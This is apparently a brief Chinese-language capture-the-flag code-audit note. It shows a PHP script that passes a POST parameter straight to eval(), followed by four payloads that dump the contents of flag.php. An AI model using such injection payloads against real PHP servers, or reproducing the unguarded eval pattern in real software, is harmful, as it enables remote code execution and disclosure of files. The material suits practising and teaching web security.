代码审计
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
同理,测试可以用的payload
c=show_source("flag.php");
c=highlight_file("flag.php");
c=require('flag.php');echo $flag;
c=print_r(php_strip_whitespace("flag.php"));